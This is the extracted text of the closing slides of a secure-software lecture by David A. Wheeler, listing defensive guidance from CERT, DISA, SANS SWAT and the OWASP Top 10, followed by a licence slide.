Source: State-of-the-Art Resources (SOAR) for Software Vulnerability
Detection, Test, and Evaluation by David A. Wheeler & Rama S. Moorthy,
Institute for Defense Analyses Paper P-5061, July 2014
* maps to NSA Center for Assured Software (CAS) structure
68
Coding standards/guides
69
Coding standards/Style guides
• Most languages & widely-used frameworks have
at least 1 style guide in wide use
• Most guides focus more on readability & generic
quality – but some include security
• Security-specific guides include:
– SEI CERT coding standards
https://www.securecoding.cert.org/confluence/displa
y/seccode/SEI+CERT+Coding+Standards
– OWASP Secure Coding Practices
https://www.owasp.org/index.php/OWASP_Secure_C
oding_Practices_-_Quick_Reference_Guide
70
Top 10 Secure Coding Practices
(CERT/SEI) (1)
Practice
Description
1. Validate input.
Validate input from all untrusted data sources. Proper input validation can eliminate the
vast majority of software vulnerabilities. Be suspicious of most external data sources,
including command line arguments, network interfaces, environmental variables, and user
controlled files [Seacord 05].
2. Heed compiler
warnings.
Compile code using the highest warning level available for your compiler and eliminate
warnings by modifying the code [C MSC00-A, C++ MSC00-A]. Use static and dynamic
analysis tools to detect and eliminate additional security flaws.
3. Architect and
design for security
policies.
Create a software architecture and design your software to implement and enforce
security policies. For example, if your system requires different privileges at different
times, consider dividing the system into distinct intercommunicating subsystems, each
with an appropriate privilege set.
4. Keep it simple.
Keep the design as simple and small as possible [Saltzer 74, Saltzer 75]. Complex designs
increase the likelihood that errors will be made in their implementation, configuration,
and use. Additionally, the effort required to achieve an appropriate level of assurance
increases dramatically as security mechanisms become more complex.
5. Default deny.
Base access decisions on permission rather than exclusion. This means that, by default,
access is denied and the protection scheme identifies conditions under which access is
permitted [Saltzer 74, Saltzer 75].
71
Top 10 Secure Coding Practices
(CERT/SEI) (2)
Practice
Description
6. Adhere to the
principle of least
privilege.
Every process should execute with the the least set of privileges necessary to complete the job. Any
elevated permission should be held for a minimum time. This approach reduces the opportunities an
attacker has to execute arbitrary code with elevated privileges [Saltzer 74, Saltzer 75].
7. Sanitize data
sent to other
systems.
Sanitize all data passed to complex subsystems [C STR02-A] such as command shells, relational databases,
and commercial off-the-shelf (COTS) components. Attackers may be able to invoke unused functionality in
these components through the use of SQL, command, or other injection attacks. This is not necessarily an
input validation problem because the complex subsystem being invoked does not understand the context in
which the call is made. Because the calling process understands the context, it is responsible for sanitizing
the data before invoking the subsystem.
8. Practice defense
in depth.
Manage risk with multiple defensive strategies, so that if one layer of defense turns out to be inadequate,
another layer of defense can prevent a security flaw from becoming an exploitable vulnerability and/or limit
the consequences of a successful exploit. For example, combining secure programming techniques with
secure runtime environments should reduce the likelihood that vulnerabilities remaining in the code at
deployment time can be exploited in the operational environment [Seacord 05].
9. Use effective
quality assurance
techniques.
Good quality assurance techniques can be effective in identifying and eliminating vulnerabilities. Fuzz
testing, penetration testing, and source code audits should all be incorporated as part of an effective quality
assurance program. Independent security reviews can lead to more secure systems. External reviewers
bring an independent perspective; for example, in identifying and correcting invalid assumptions [Seacord
05].
10. Adopt a secure
coding standard.
Develop and/or apply a secure coding standard for your target development language and platform
72
DISA AppSec Dev STIG
• DISA “Application Security and Development
STIG”
– Used by Department of Defense (DOD)
• Contract language, e.g.:
– “(APP3540.1: CAT I) The Designer will ensure the
application is not vulnerable to SQL injection.”
• http://iase.disa.mil/stigs/a-z.html
73
SANS Securing Web Application
Technologies (SWAT) Checklist (1)
•
Error handling & logging
– Display generic error messages
– No unhandled exceptions
– Suppress framework generated
errors
– Log all authentication activities
– Log all privilege changes
– Log administrative activities
– Log access to sensitive data
– Do not log inappropriate data
– Store logs securely
•
Data protection
– Use SSL everywhere
– Disable HTTP access for all SSL
enabled resources
– Use the strict- Transport-security
header
– Store user passwords using a strong,
iterative, salted hash
– Securely exchange encryption keys
– Disable weak SSL ciphers on servers
– Use valid SSL certificates from a
reputable CA
– Disable data caching using cache
control headers and autocomplete
– Limit the use and storage of sensitive
data
Source: https://software-security.sans.org/resources/swat
74
SANS Securing Web Application
Technologies (SWAT) Checklist (2)
•
Configuration and operations
– Establish a rigorous change
management process
– Define security requirements
– Conduct a design review
– Perform code reviews
– Perform security testing
– Harden the infrastructure
– Define an incident handling plan
– Educate the team on security
•
Authentication
– Don't hardcode credentials
– Develop a strong password reset
system
– Implement a strong password policy
– Implement account lockout against
brute force attacks
– Don't disclose too much information
in error messages
– Store database credentials securely
– Applications and Middleware should
run with minimal privileges
75
SANS Securing Web Application
Technologies (SWAT) Checklist (3)
•
Session management
– Ensure that session identifiers are
sufficiently random
– Regenerate session tokens
– Implement an idle session timeout
– Implement an absolute session
timeout
– Destroy sessions at any sign of
tampering
– Invalidate the session after logout
– Place a logout button on every page
– Use secure cookie attributes (i.e.
httponly and secure flags)
– Set the cookie domain and path
correctly
– Set the cookie expiration time
•
Input & output handling
–
–
–
–
–
–
–
–
–
–
Conduct contextual output encoding
Prefer whitelists over blacklists
use parameterized SQL queries
Use tokens to prevent forged
requests
Set the encoding for your application
Validate uploaded files
Use the nosniff header for uploaded
content
Validate the source of input
use the X-frame- options header
use content security Policy (csP) or XXss- Protection headers
76
SANS Securing Web Application
Technologies (SWAT) Checklist (4)
• Access control
– Apply access controls
checks consistently
– Apply the principle of
least privilege
– Don’t use direct object
references for access
control checks
– Don’t use unvalidated
forwards or redirects
77
Conclusions
• Be careful sending output back
– Escape metacharacters so not misinterpreted
• Web applications
– Beware of session fixation, XSS, XSRF
• Developing secure software is not just knowing &
countering common weaknesses
– Good design! Prevent, detect, and recover!
• Weakness lists can help remind/focus on biggest
problems, taxonomies help describe
– There are a number of common past mistakes – once
you know what they are, you can avoid them
78
Backup
79
OWASP Top 10 (2010)
Security Risk
Covered in class session on:
A1: Injection
Call out (SQL injection, shell injection)
A2: Cross-Site Scripting (XSS)
Design/Web application
A3: Broken Authentication and Session
Management
Authentication
A4: Insecure Direct Object References
Design (least privilege)
A5: Cross-Site Request Forgery (CSRF)
Design/Web application
A6: Security Misconfiguration
Design
A7: Insecure Cryptographic Storage
Cryptography
A8: Failure to Restrict URL Access
Design (least privilege)/web application
A9: Insufficient Transport Layer Protection
Cryptography
A10: Unvalidated Redirects and Forwards
Design/Web application
80
Released under CC BY-SA 3.0
• This presentation is released under the Creative Commons AttributionShareAlike 3.0 Unported (CC BY-SA 3.0) license
• You are free:
– to Share — to copy, distribute and transmit the work
– to Remix — to adapt the work
– to make commercial use of the work
• Under the following conditions:
– Attribution — You must attribute the work in the manner specified by the
author or licensor (but not in any way that suggests that they endorse you or
your use of the work)
– Share Alike — If you alter, transform, or build upon this work, you may
distribute the resulting work only under the same or similar license to this one
• These conditions can be waived by permission from the copyright holder
– dwheeler at dwheeler dot com
• Details at: http://creativecommons.org/licenses/by-sa/3.0/
• Attribute me as “David A. Wheeler”
81